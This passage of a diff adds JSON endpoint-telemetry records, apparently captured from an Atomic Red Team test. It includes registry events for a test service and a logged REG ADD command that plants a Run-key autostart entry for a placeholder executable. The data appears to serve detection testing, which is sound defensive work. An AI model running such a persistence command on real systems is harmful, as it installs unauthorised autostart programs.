"timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", + "registry_value": "DeleteFlag", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 260, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570852680000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "command_line": "REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6156, + "ppid": 260, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 